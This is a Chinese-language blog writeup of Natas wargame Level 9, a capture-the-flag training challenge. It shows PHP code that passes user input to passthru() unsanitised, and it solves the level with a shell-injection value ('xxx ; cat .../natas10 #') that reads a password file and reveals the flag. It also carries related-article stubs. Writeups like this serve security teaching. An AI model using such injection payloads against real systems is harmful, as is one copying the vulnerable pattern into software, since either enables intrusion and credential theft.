yywKXrHbK7BFIQ4S9leOmWhXBfjzLfua1j+Vd32qvrzX899caroHsbWNGjU0Lz/5rnkxWE1BTCXadg/E/eofKoLwikZ2pQNxDnNUfniWvrPp2UBU69W/PYPls+TxlZi/4vhH7VJlWrLMLUGW6zHIuf0EjLR6w6cff2leD1aa0IoS6lNe8cnBxMFJwQoFGrNueIYfFTAKzjFxjjOOk4NlxKLO00znQlR+g9Wrf1oULWpvRB4iNgIKWRCAAAQgAIEiEdBbnm49e0qwEkAPM3bCfpFWhN8g5Qqd8+Boo2WyXNJj+4ev0VujFtq3Rmk9WcW5jgzexOW/ycrv5Jm73rBrxGot1F8eU/XtXvdf+py5+6L/maPO29UMzVHASujJW6j4Wnkq9Zhf68FuHIhh9eNWQ/BtkRfYvfVKca9tA2Gu5b72HRPY/1NsbhjQS4FgvfuiaebjQKwr5lNhEQefvpM5btD1RqEESlpTd9x9B1oxPmb7G8JNmB337Re8ZGHPtHxl+DYpLKHDemsFoR8bWrEf5YXM9Rjk2n6ujNybuJ6a8Jq9kdGNzaY7djMHn7aTOXv/e6w4V9LLHC6efHiKQeQ4Bvcwex+3TcZzKRJgRKadn5WrgFU7iNgImmRBAAIQgAAEIAABCKQRyGcoqmsr6yoEaVYEGaxMEEWFPAhAAAIQgEDhCBzQ5R+Fa5yWIVAEAnd/dFLiXhN5YP3e8MYmZk9FCEAAAhCAAAQgUC8J5NPr6gOqkQc2qiGEbL08/xgUBCAAAQhAAAIQiE2gUMJVBvhtJwohiBqF3yhiNooQeRCAAAQgAAEIQKD+ESikaM1EK28C1u8gzkAQuZkOCfkQgAAEIAABCECgbhCIo+lqw9KwHQURsHEGEjYkTh3KQAACEIAABCAAAQiUF4EozRjrTVzlhYnRQgACEIAABCAAAQjUZQII2Lp8dLANAhCAAAQgAAEIlDGBKO+rcCBgy/ikYOgQgAAEIAABCECgrhLIJF5lLwK2rh417IIABCAAAQhAAAJlSqA68SokDbMVKFNuDBsCEIAABCAAAQhAoAgE4mhT64GNU7AI9tMlBCAAAQhAAAIQgEAZEYirSVMhBHErlBFDhgoBCEAAAhCAAAQgUEsEctGi/w/uzxWrVnNBlQAAAABJRU5ErkJggg==" alt="" />

sourcedode中的关键代码:

 <?

 $key = "";

 if(array_key_exists("needle", $_REQUEST)) {

     $key = $_REQUEST["needle"];

 }

 if($key != "") {

     passthru("grep -i $key dictionary.txt");

 }

 ?>

 

此处的关键在于passthru()执行的系统命令,以下是passthru()的相关介绍:

---------------------------------------------------------------------------------------------------------

void passthru ( string $command [, int &$return_var ] )

exec() 函数类似, passthru() 函数 也是用来执行外部命令(command)的。 当所执行的 Unix 命令输出二进制数据, 并且需要直接传送到浏览器的时候, 需要用此函数来替代 exec()system() 函数。 常用来执行诸如 pbmplus 之类的可以直接输出图像流的命令。 通过设置 Content-type 为 image/gif, 然后调用 pbmplus 程序输出 gif 文件, 就可以从 PHP 脚本中直接输出图像到浏览器。

Warning

当用户提供的数据传入此函数,使用 escapeshellarg()escapeshellcmd() 来确保用户欺骗系统从而执行任意命令。

-------------------------------------------------------------------------------

输入.*,出现当前目录下的dictionary文件,没有意义。结合Natas首页的信息“Each level has access to the password of the next level. Your job is to somehow obtain that next password and level up. All passwords are also stored in /etc/natas_webpass/. E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5.”可以得知输出etc/natas_webpass/natas10即可。

于是执行“xxx ; cat etc/natas_webpass/natas10 #”,其中xxx无用,与前面的grep -i 结合,随后的分号作为另一条命令的分隔,输出etc/natas_webpass/natas10,#将末尾的dictionary注释掉。

得到flag:nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Natas Wargame Level 9 Writeup(bash injection)的更多相关文章

  1. Natas Wargame Level 19 Writeup(猜测令牌,会话劫持)

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAq4AAAEKCAYAAADTmtdjAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF

  2. Natas Wargame Level 13 Writeup(文件上传漏洞,篡改file signature,Exif)

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAqMAAADDCAYAAAC29BgbAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF

  3. Natas Wargame Level 12 Writeup(文件上传漏洞)

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAsQAAAChCAYAAADA86lDAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF

  4. Natas Wargame Level 15 Writeup(Content-based Blind SQL Injection)

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAq4AAACGCAYAAAAcnwh0AAAABHNCSVQICAgIfAhkiAAAIABJREFUeF

  5. Natas Wargame Level 2 Writeup 与目录泄露(强制访问)

  6. Natas Wargame Level 3 Writeup 与 robots.txt

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAnsAAAC5CAYAAABQi/kBAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF

  7. Natas Wargame Level 16 Writeup(Content-based Blind SQL Injection)

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAqwAAADhCAYAAAANm+erAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF

  8. Natas Wargame Level 17 Writeup(Time-based Blind SQL Injection)

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAArIAAACUCAYAAABvE8qCAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF

  9. 清晰架构(Clean Architecture)的Go微服务: 依赖注入(Dependency Injection)

    在清晰架构(Clean Architecture)中,应用程序的每一层(用例,数据服务和域模型)仅依赖于其他层的接口而不是具体类型. 在运行时,程序容器¹负责创建具体类型并将它们注入到每个函数中,它使 ...

随机推荐

  1. 3.Redis常用命令:String

    字符串类型是Redis中最为基础的数据存储类型,它在Redis中是二进制安全的,这便意味着该类型可以接受任何格式的数据,如JPEG图像数据或Json对象描述信息等.在Redis中字符串类型的Value ...

  2. 1133: 零起点学算法40——多组测试数据(a+b)II

    1133: 零起点学算法40--多组测试数据(a+b)II Time Limit: 1 Sec  Memory Limit: 64 MB   64bit IO Format: %lldSubmitte ...

  3. flowJS源码个人分析

    刚刚在腾讯云技术社区前端专栏中看到一篇腾讯高级前端工程师写的<一个只有99行代码的js流程框架>觉得很屌,感觉是将后台的简单的工作流思维搬到了前端js实现,本人不才在这里拜读解析下源码,而 ...

  4. DOM的发展,DOM0,DOM1,DOM2,DOM3

    Documentc Object Model文档对象模型是针对XML但经过扩展用于HTML的应用程序接口(API Application programming Interface).DOM把整个界面 ...

  5. java复习(2)---java基础杂记

    java命名规范: 参考:http://www.cnblogs.com/maowang1991/archive/2013/06/29/3162366.html 1.项目名小写 2.包名小写 3.类名每 ...

  6. Unity加载场景、计时器、加载时不销毁某物体

    异步加载场景,SceneManager.LoadSceneAsync(SceneName);需引用 using UnityEngine.SceneManagement;命名空间, Applicatio ...

  7. 《阿里巴巴Java开发手册(正式版》读记

    前几天,阿里巴巴发布了<阿里巴巴Java开发手册(正式版>,第一时间下载阅读了一番. 不同于一般大厂内部的代码规范,阿里巴巴的这本Java开发手册,可谓包罗万象,几乎日常Java开发中方方 ...

  8. wpf之StackPanel、WrapPanel、WrapPanel之间的关系

    一.StackPanel StackPanel是以堆叠的方式显示其中的控件 1.可以使用Orientation属性更改堆叠的顺序分为水平方向(Orientation="Horizontal& ...

  9. 对象Equals相等性比较的通用实现

    最近编码的过程中,使用了对象本地内存缓存,缓存用了Dictionary<string,object>, ConcurrentDictionary<string,oject>,还 ...

  10. MyBatis-plus 代码自动生成器

    MyBatis-plus  代码自动生成器 1.添加pom文件依赖 <!-- Mybatis-Plus 自动生成实体类--> <dependency> <groupId& ...